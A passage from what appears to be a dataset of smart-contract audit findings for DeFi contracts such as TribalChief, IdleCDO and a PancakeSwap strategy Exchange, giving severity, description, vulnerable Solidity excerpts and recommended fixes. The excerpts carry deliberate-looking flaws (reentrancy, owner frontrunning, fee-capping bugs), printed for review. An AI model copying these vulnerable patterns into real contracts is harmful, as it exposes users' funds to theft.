NewTribePerBlock(newBlockReward);\\n}\\n```\\nчIt is recommended to update pools before changing the block reward. Document and make users aware that the new reward is applied to the outstanding duration when calling `updatePool`.чч```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n -TribalChief - resetRewards should emit an eventчlowчThe method `resetRewards` silently resets a pools tribe allocation.\\n```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. \\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\nчFor transparency and to create an easily accessible audit trail of events consider emitting an event when resetting a pools allocation.чч```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. \\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\n -TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missingчmediumчWhen a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\nчReplace the `<` operator with `>` in `TribalChief` line 152.чч```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n -TribalChief - Governor decrease of pool's allocation point should unlock depositors' fundsчlowчWhen the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\nчMake sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.чч```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n -IdleCDO._deposit() allows re-entrancy from hookable tokens.чmediumчThe function `IdleCDO._deposit()` updates the system's internal accounting and mints shares to the caller, then transfers the deposited funds from the user. Some token standards, such as ERC777, allow a callback to the source of the funds before the balances are updated in `transferFrom()`. This callback could be used to re-enter the protocol while already holding the minted tranche tokens and at a point where the system accounting reflects a receipt of funds that has not yet occurred.\\nWhile an attacker could not interact with `IdleCDO.withdraw()` within this callback because of the `_checkSameTx()` restriction, they would be able to interact with the rest of the protocol.\\n```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\nчMove the `transferFrom()` action in `_deposit()` to immediately after `_updateCallerBlock()`.чч```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\n -IdleCDO.virtualPrice() and _updatePrices() yield different prices in a number of casesчmediumчThe function `IdleCDO.virtualPrice()` is used to determine the current price of a tranche. Similarly, `IdleCDO._updatePrices()` is used to store the latest price of a tranche, as well as update other parts of the system accounting. There are a number of cases where the prices yielded by these two functions differ. While these are primarily corner cases that are not obviously exploitable in practice, potential violations of key accounting invariants should always be considered serious.\\nAdditionally, the use of two separate implementations of the same calculation suggest the potential for more undiscovered discrepancies, possibly of higher consequence.\\nAs an example, in `_updatePrices()` the precision loss from splitting the strategy returns favors BB tranche holders. In `virtualPrice()` both branches of the price calculation incur precision loss, favoring the `IdleCDO` contract itself.\\n`_updatePrices()`\\n```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n\\n`virtualPrice()`\\n```\\nif (\\_tranche == AATranche) {\\n // calculate gain for AA tranche\\n // trancheGain (AAGain) = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n trancheNAV = lastNAVAA + (gain \\* \\_trancheAPRSplitRatio / FULL\\_ALLOC);\\n} else {\\n // calculate gain for BB tranche\\n // trancheGain (BBGain) = gain \\* (FULL\\_ALLOC - trancheAPRSplitRatio) / FULL\\_ALLOC;\\n trancheNAV = lastNAVBB + (gain \\* (FULL\\_ALLOC - \\_trancheAPRSplitRatio) / FULL\\_ALLOC);\\n}\\n```\\nчImplement a single method that determines the current price for a tranche, and use this same implementation anywhere the price is needed.чч```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n -IdleCDO.harvest() allows price manipulation in certain circumstancesчmediumчThe function `IdleCDO.harvest()` uses Uniswap to liquidate rewards earned by the contract's strategy, then updates the relevant positions and internal accounting. This function can only be called by the contract `owner` or the designated `rebalancer` address, and it accepts an array which indicates the minimum buy amounts for the liquidation of each reward token.\\nThe purpose of permissioning this method and specifying minimum buy amounts is to prevent a sandwiching attack from manipulating the reserves of the Uniswap pools and forcing the `IdleCDO` contract to incur loss due to price slippage.\\nHowever, this does not effectively prevent price manipulation in all cases. Because the contract sells it's entire balance of redeemed rewards for the specified minimum buy amount, this approach does not enforce a minimum price for the executed trades. If the balance of `IdleCDO` or the amount of claimable rewards increases between the submission of the `harvest()` transaction and its execution, it may be possible to perform a profitable sandwiching attack while still satisfying the required minimum buy amounts.\\nThe viability of this exploit depends on how effectively an attacker can increase the amount of rewards tokens to be sold without incurring an offsetting loss. The strategy contracts used by `IdleCDO` are expected to vary widely in their implementations, and this manipulation could potentially be done either through direct interaction with the protocol or as part of a flashbots bundle containing a large position adjustment from an honest user.\\n```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), \"IDLE:!AUTH\");\\n```\\n\\n```\\n// approve the uniswap router to spend our reward\\nIERC20Detailed(rewardToken).safeIncreaseAllowance(address(\\_uniRouter), \\_currentBalance);\\n// do the uniswap trade\\n\\_uniRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(\\n \\_currentBalance,\\n \\_minAmount[i],\\n \\_path,\\n address(this),\\n block.timestamp + 1\\n);\\n```\\nчUpdate `IdleCDO.harvest()` to enforce a minimum price rather than a minimum buy amount. One method of doing so would be taking an additional array parameter indicating the amount of each token to sell in exchange for the respective buy amount.чч```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), \"IDLE:!AUTH\");\\n```\\n -Missing Sanity checksчlowчThe implementation of `initialize()` functions are missing some sanity checks. The proper checks are implemented in some of the setter functions but missing in some others.\\nMissing sanity check for `!= address(0)`\\n```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n\\n```\\nguardian = \\_owner;\\n```\\n\\n```\\naddress \\_currAAStaking = AAStaking;\\naddress \\_currBBStaking = BBStaking;\\n```\\n\\n```\\nidleCDO = \\_idleCDO;\\ntranche = \\_trancheToken;\\nrewards = \\_rewards;\\ngovernanceRecoveryFund = \\_governanceRecoveryFund;\\n```\\nчResolution\\nThe development team has addressed this concern in commit `a1d5dac0ad5f562d4c75bff99e770d92bcc2a72f`. This change has not been reviewed by the audit team.\\nAdd sanity checks before assigning system variables.чч```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n -Frontrunning attacks by the ownerчhighчThere are few possible attack vectors by the owner:\\nAll strategies have fees from rewards. In addition to that, the PancakeSwap strategy has deposit fees. The default deposit fees equal zero; the maximum is limited to 5%:\\n```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n\\nWhen a user deposits tokens, expecting to have zero deposit fees, the `owner` can frontrun the deposit and increase fees to 5%. If the deposit size is big enough, that may be a significant amount of money. 2. In the `gulp` function, the reward tokens are exchanged for the reserve tokens on the exchange:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n {\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n uint256 \\_feeReward = \\_totalReward.mul(performanceFee) / 1e18;\\n Transfers.\\_pushFunds(rewardToken, collector, \\_feeReward);\\n }\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n require(\\_totalBalance >= \\_minRewardAmount, \"high slippage\");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nThe `owner` can change the `exchange` parameter to the malicious address that steals tokens. The `owner` then calls `gulp` with `_minRewardAmount==0`, and all the rewards will be stolen. The same attack can be implemented in fee collectors and the buyback contract.чResolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nUse a timelock to avoid instant changes of the parameters.чч```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n -Expected amounts of tokens in the withdraw functionчmediumчEvery `withdraw` function in the strategy contracts is calculating the expected amount of the returned tokens before withdrawing them:\\n```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, \"high slippage\");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n\\nAfter that, the contract is trying to transfer this pre-calculated amount to the `msg.sender`. It is never checked whether the intended amount was actually transferred to the strategy contract. If the amount is lower, that may result in reverting the `withdraw` function all the time and locking up tokens.\\nEven though we did not find any specific case of returning a different amount of tokens, it is still a good idea to handle this situation to minimize relying on the security of the external contracts.чResolution\\nClient's statement : “This issue did not really need fixing. The mitigation was already in place by depositing a tiny amount of the reserve into the contract, if necessary”\\nThere are a few options how to mitigate the issue:\\nDouble-check the balance difference before and after the MasterChef's `withdraw` function is called.\\nHandle this situation in the emergency mode (https://github.com/ConsenSys/growthdefi-audit-2021-06/issues/11).чч```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, \"high slippage\");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n -The capping mechanism for Panther token leads to increased feesчmediumчPanther token has a cap in transfer sizes, so any transfer in the contract is limited beforehand:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, \"high slippage\");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nFees here are calculated from the full amount of rewards (__totalReward ):\\n```\\n(uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n```\\n\\nBut in fact, if the amount of the rewards is too big, it will be capped, and the residuals will be “taxed” again during the next call of the `gulp` function. That behavior leads to multiple taxations of the same tokens, which means increased fees.чResolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nThe best solution would be to cap `__totalReward` first and then calculate fees from the capped value.чч```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, \"high slippage\");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n -The _capFeeAmount function is not working as intendedчmediumчPanther token has a limit on the transfer size. Because of that, all the Panther transfer values in the `PantherSwapCompoundingStrategyToken` are also capped beforehand. The following function is called to cap the size of fees:\\n```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n\\nThis function should return the capped amount and the amount of retained tokens. But because the `_amount` is changed before calculating the `_retained`, the retained amount will always be 0.чCalculate the `retained` value before changing the `amount`.чч```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n -Stale split ratios in UniversalBuybackчmediumчThe `gulp` and `pendingBurning` functions of the `UniversalBuyback` contract use the hardcoded, constant values of `DEFAULT_REWARD_BUYBACK1_SHARE` and `DEFAULT_REWARD_BUYBACK2_SHARE` to determine the ratio the trade value is split with.\\nConsequently, any call to `setRewardSplit` to set a new ratio will be ineffective but still result in a `ChangeRewardSplit` event being emitted. This event can deceive system operators and users as it does not reflect the correct values of the contract.\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\nчInstead of the default values, `rewardBuyback1Share` and `rewardBuyback2Share` should be used.чч```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n -Exchange owner might steal users' funds using reentrancyчmediumчThe practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return \\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\nчReentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.чч```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n -Exchange owner might steal users' funds using reentrancyчmediumчThe practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return \\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, 